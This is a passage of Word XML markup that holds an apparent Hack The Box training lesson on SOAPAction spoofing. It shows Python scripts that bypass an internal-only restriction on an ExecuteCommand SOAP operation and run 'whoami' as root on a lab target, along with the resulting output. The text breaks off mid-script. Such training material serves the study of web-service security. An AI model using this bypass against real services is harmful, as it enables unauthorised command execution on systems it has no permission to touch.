        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;wsdl:operation name="ExecuteCommand"&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;soap:operation soapAction="ExecuteCommand" style="document"/&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="513AABF9" w14:textId="18270701" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We can see a SOAPAction operation called </w:t>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ExecuteCommand</w:t>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FAD0FE" w14:textId="65563859" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Let us take a look at the parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB552D4" w14:textId="2A514A18" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Code: xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADE702C" w14:textId="021E72F2" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;s:element name="ExecuteCommandRequest"&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;s:complexType&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;s:sequence&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;s:element minOccurs="1" maxOccurs="1" name="cmd" type="s:string"/&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/s:sequence&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/s:complexType&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/s:element&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DB6319" w14:textId="5CFB9B52" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We notice that there is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter. Let us build a Python script to issue requests (save it as client.py). Note that the below script will try to have the SOAP service execute a whoami command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C9586" w14:textId="1D585782" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Code: python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDCAA82" w14:textId="04B2ABFE" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import requests</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>payload = '&lt;?xml version="1.0" encoding="utf-8"?&gt;&lt;soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  xmlns:tns="http://tempuri.org/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/"&gt;&lt;soap:Body&gt;&lt;ExecuteCommandRequest xmlns="http://tempuri.org/"&gt;&lt;cmd&gt;whoami&lt;/cmd&gt;&lt;/ExecuteCommandRequest&gt;&lt;/soap:Body&gt;&lt;/soap:Envelope&gt;'</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>print(requests.post("http://&lt;TARGET IP&gt;:3002/wsdl", data=payload, headers={"SOAPAction":'"ExecuteCommand"'}).content)</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE97584" w14:textId="3EA8C297" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Python script can be executed, as follows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2380AD" w14:textId="70AC7082" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>yovecio@htb[/htb]$ python3 client.py</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b'&lt;?xml version="1.0" encoding="utf-8"?&gt;&lt;soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"  xmlns:tns="http://tempuri.org/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/"&gt;&lt;soap:Body&gt;&lt;ExecuteCommandResponse xmlns="http://tempuri.org/"&gt;&lt;success&gt;false&lt;/success&gt;&lt;error&gt;This function is only allowed in internal networks&lt;/error&gt;&lt;/ExecuteCommandResponse&gt;&lt;/soap:Body&gt;&lt;/soap:Envelope&gt;'</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D7D79C" w14:textId="77582C05" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We get an error mentioning </w:t>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This function is only allowed in internal networks</w:t>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. We have no access to the internal networks. Does this mean we are stuck? Not yet! Let us try a SOAPAction spoofing attack, as follows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FCCFEB" w14:textId="4554E4C5" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Let us build a new Python script for our SOAPAction spoofing attack (save it as client_soapaction_spoofing.py).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD3A329" w14:textId="7E06A27A" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Code: python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0260A4FD" w14:textId="6FA39DB0" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import requests</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>payload = '&lt;?xml version="1.0" encoding="utf-8"?&gt;&lt;soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  xmlns:tns="http://tempuri.org/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/"&gt;&lt;soap:Body&gt;&lt;LoginRequest xmlns="http://tempuri.org/"&gt;&lt;cmd&gt;whoami&lt;/cmd&gt;&lt;/LoginRequest&gt;&lt;/soap:Body&gt;&lt;/soap:Envelope&gt;'</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>print(requests.post("http://&lt;TARGET IP&gt;:3002/wsdl", data=payload, headers={"SOAPAction":'"ExecuteCommand"'}).content)</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BACFE7" w14:textId="67432586" w:rsidR="00F375C0" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We specify </w:t>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LoginRequest</w:t>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in &lt;soap:Body&gt;, so that our request goes through. </w:t>
      </w:r>
      <w:r w:rsidRPr="4299D736">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>This operation is allowed from the outside.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C126F3" w14:textId="0B48D83B" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We specify the parameters of </w:t>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ExecuteCommand</w:t>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> because we want to have the SOAP service execute a whoami command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051BF936" w14:textId="3485E6F2" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We specify the blocked operation (</w:t>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ExecuteCommand</w:t>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) in the SOAPAction header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051ECA5C" w14:textId="79C6648D" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If the web service determines the operation to be executed based solely on the SOAPAction header, we may bypass the restrictions and have the SOAP service execute a whoami command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E272E9D" w14:textId="22E1B3DF" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Let us execute the new script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1404C6" w14:textId="5B6703DA" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>yovecio@htb[/htb]$ python3 client_soapaction_spoofing.py</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b'&lt;?xml version="1.0" encoding="utf-8"?&gt;&lt;soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"  xmlns:tns="http://tempuri.org/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/"&gt;&lt;soap:Body&gt;&lt;LoginResponse xmlns="http://tempuri.org/"&gt;&lt;success&gt;true&lt;/success&gt;&lt;result&gt;root\n&lt;/result&gt;&lt;/LoginResponse&gt;&lt;/soap:Body&gt;&lt;/soap:Envelope&gt;'</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="495E16D2" w14:textId="26037047" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Our whoami command was executed successfully, bypassing the restrictions through SOAPAction spoofing!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5557EB8F" w14:textId="2AA6E556" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If you want to be able to specify multiple commands and see the result each time, use the following Python script (save it as automate.py).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00127B7E" w14:textId="57ABBE65" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Code: python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA4981A" w14:textId="11C448B6" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
